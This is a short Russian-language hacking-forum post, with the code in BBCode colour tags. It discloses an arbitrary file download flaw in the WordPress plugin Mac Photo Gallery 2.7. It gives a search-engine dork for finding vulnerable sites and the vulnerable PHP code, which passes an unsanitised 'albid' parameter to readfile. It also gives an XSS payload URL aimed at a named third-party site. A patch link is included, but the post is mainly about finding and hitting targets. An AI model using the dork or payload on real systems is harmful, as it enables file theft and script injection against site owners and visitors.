29.04.2015, 19:54
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от winstrool
↑
MAC PHOTO GALLERY v. 2.7
MAC PHOTO GALLERY
dork: inurl
lugins/mac-dock-gallery/ download
@version:2.7
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]"/uploads/mac-dock-gallery/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'albid'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Description: File Transfer'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Type: application/octet-stream'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Disposition: attachment; filename='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Transfer-Encoding: binary'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Expires: 0'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Cache-Control: must-revalidate, post-check=0, pre-check=0'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Pragma: public'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Length: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]filesize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]ob_clean[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]flush[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
POC:
PATCH:
https://wordpress.org/plugins/mac-do...y/other_notes/
Ну и xss там же
Код:
http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1">&limit=42
|
|
|